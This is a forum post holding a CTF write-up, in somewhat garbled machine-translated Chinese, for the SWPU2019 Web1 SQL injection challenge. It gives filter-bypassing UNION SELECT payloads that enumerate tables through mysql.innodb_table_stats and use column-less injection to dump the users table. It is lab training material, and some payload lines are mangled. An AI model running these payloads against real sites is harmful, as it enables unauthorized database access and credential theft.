• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Recommended Posts

[SWPU2019]Web1 WriteUp

知识点

了解有关可用于查询的表的详细信息。

除了常用的information_schema中的TABLES、COLUMNS、SCHEMATA

sys中的schema_auto_increment_columns记录由该列自动添加的表名。

image-20220501114338074

列名值

Table_schema该表的数据库名称

Table_name限定的表名

Column_name自动添加列名

mysql中也有innodb_index_statsinnodb_table_stats(包括所有自定义表)

image-20220501114515294

image-20220501114535843

列名值

数据库名称数据库名称

表名

没有列名注入

模板:select * from ads其中name='-1' union select 1,(select group _ concat (a,0x7e,b) from (select 1,2as a,3as b union select * from user) XXX),3,4,5,6

题解

想着解决问题,先扫描一下,发现没有漏。我根据经验试过,但是不知道admin的密码。注册就好,然后登录打广告。发现Sql注入。这种类似的问题就是劫持会话,以admin身份登录,会出flag。但是,这个问题是关于sql注入的。

简单的判断是单引号被关闭,or and 空格 注释被过滤。所以order,information_schema不能用。

用/* */代替空格,一个一个试,发现字段数是22。

image-20220501115850067

并且可以显示场2和场3。检查版本和数据库,它被命名为web1.

123'/**/uNIon/**/select/**/1,2,concat(version(),0x7e,schema()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,' 22

image-20220501120039237

然后查询表名。sys.schema_auto_increment_columns不能使用它。使用mysql.innodb_table_stats,的名字是广告,用户。

123'/**/uNIon/**/select/**/1,2,(select/* */group _ concat(table _ name)/* */from/* */MySQL . innodb _ table _ stats/* */where/* */database _ name=schema()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,' 22

image-20220501120632127

根据经验,ads存储的是广告等,而用户存储的是注册账号密码,可能存在flag。列名仅在information_schema中。列,所以它只能在没有列名的情况下被注入。根据经验,users表只有三个字段,猜测的字段名分别是id、用户名和密码。

查询用户表的内容

123'/**/uNIon/**/select/**/1,2,(select/**/group_concat(a,0x7e,b)/**/from/**/(select/**/1,2/**/as/**/a,3/* */as/* */b/* */uNIon/* */select/* */*/* */from/* */users)XXX),4,5,6,7,8,9,10,11,12,13,14,15,16,17,17

image-20220501121241676

如你所见,我在用户中注册了两个账户admin和admin123。密码应该用md5加密。

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now